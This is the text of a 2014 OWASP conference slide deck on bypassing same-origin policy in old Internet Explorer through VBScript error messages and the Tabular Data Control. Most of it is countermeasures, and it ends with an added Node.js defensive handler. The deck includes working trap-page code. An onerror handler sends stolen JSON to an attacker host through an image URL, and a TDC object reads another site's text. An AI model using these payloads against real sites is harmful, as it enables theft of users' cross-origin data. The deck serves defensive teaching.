March 19, 14
Slide overview
OWASP AppSec APAC 2014
Bypass SOP, Theft your data - XSS Allstars from Japan - Yosuke HASEGAWA
About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http://utf-8.jp/
author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member
Agenda
Cross-Origin information disclosure
Not XSS, but bypass SOP
Introduce 2 ways for modern IE
VBScript Error msg
Tabular Data Control
VBScript Error message
VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
Reading a JSON array as VBScript on a trap page created by the attacker
VBScript raises an exception with an error message that includes the JSON content
JavaScript can access the JSON content via the error message
VBScript Error Msg
Reading JSON as VBScript src
fail → raises exception
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]
// Trap page by attacker
<script
src="http://example.jp/target.json"
language="vbscript">
</script>
VBScript Error Msg
catch error msg with error handler
<script>
window.onerror = function( e ){
document.getElementById( "img" ).setAttribute(
"src", "http://attacker.utf-8.jp/log?" + e );
}
</script>
<script src="http://example.jp/target.json"
language="vbscript"></script>
GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'
%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1
Referer: http://attacker.utf-8.jp/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT
6.1; WOW64; Trident/6.0)
Countermeasure
add "X-Content-Type-Options: nosniff"
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
[ "secret", "data", "is", "here" ]
VBScript Error Msg supplementary
Dec 2012: reported to MS by me and @masa141421356
May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not.
"Add the X-C-T-O header for IE9-11 to prevent this attack, this is BEHAVIOR BY DESIGN" they said.
Tabular Data Control
Tabular Data Control - TDC
ActiveX Control for binding a text file into HTML as a data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx
Enabled by default on IE6-IE11, with older doc-mode
<meta http-equiv="x-ua-compatible" content="IE=10">
Spotlighted by Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato
Tabular Data Control
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here
// Trap page by attacker on attacker.utf-8.jp
function show(){
var s = document.getElementById("tdc")
.recordset.getString();
alert( s );
}
...
<meta http-equiv="x-ua-compatible" content="IE=10" >
<object id="tdc" ondatasetcomplete="show()"
classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://example.jp/target.txt">
</object>
Tabular Data Control
The attacker has to insert "@!allow_domains=..." at the top of the target text
Once inserted, there is no way to prevent the theft
Unhelpful: X-Content-Type-Options: nosniff, Content-Disposition: attachment
Countermeasure
Restrict access to XHR requests with a custom X- header
var xhr = new XMLHttpRequest();
xhr.open( "GET", "http://example.jp/target.txt", true );
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.send( null );
GET /target.json HTTP/1.1
Host: example.jp
User-Agent: Mozilla/5.0…
Accept: */*
X-Requested-With: XMLHttpRequest
and / or...
Countermeasure (cont.)
Don't allow the attacker to place text at the top of the content
//target page included secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here
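As an added example (not code from the slides): a Node.js handler for a resource like example.jp/target.txt that applies both countermeasures above. It refuses requests that lack the X-Requested-With header, sends nosniff on every response, and keeps a server-chosen column line at the top of the CSV so a user-supplied value can never be the first line. The rows, column names and file name are constructed.

```javascript
// Constructed stand-in for the secret rows behind example.jp/target.txt.
const SECRET_ROWS = [["secret", "data", "is", "here"]];

// Column names chosen by the server. They always form the first line, so text
// from a user can never sit at the top of the file, where TDC reads "@!allow_domains=".
const COLUMNS = ["w1", "w2", "w3", "w4"];

function csvBody(rows) {
  // Strip line breaks and quote every cell, so a stored value cannot start a new line.
  const quote = (cell) =>
    '"' + String(cell).replace(/[\r\n]/g, " ").replace(/"/g, '""') + '"';
  return [COLUMNS, ...rows].map((r) => r.map(quote).join(",")).join("\r\n") + "\r\n";
}

// Headers on every response: nosniff stops IE from running text fetched via
// <script language="vbscript">; attachment keeps it out of direct navigation.
function baselineHeaders() {
  return {
    "Content-Type": "text/csv; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": "attachment; filename=data.csv",
  };
}

// <script>, <object> (TDC) and <img> cannot attach request headers, and a
// cross-origin XMLHttpRequest that adds one triggers a CORS preflight this server
// never answers, so only same-origin XHR can present the header.
function hasXhrHeader(headers) {
  const value = headers["x-requested-with"];
  return typeof value === "string" && value.toLowerCase() === "xmlhttprequest";
}

// Pure handler: takes { method, headers } and returns { status, headers, body }.
// To serve it, copy status/headers/body onto the res object of http.createServer.
function buildResponse(req) {
  const headers = {};
  for (const [k, v] of Object.entries(req.headers || {})) headers[k.toLowerCase()] = v;
  if (req.method !== "GET" || !hasXhrHeader(headers)) {
    return { status: 403, headers: baselineHeaders(), body: "" };
  }
  return { status: 200, headers: baselineHeaders(), body: csvBody(SECRET_ROWS) };
}
```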
Conclusion
Conclusion
IE has funny behavior even now
Add X-Content-Type-Options for all resources
Restrict access to XHR with a custom X- header
Questions?
[email protected]
@hasegawayosuke
http://utf-8.jp/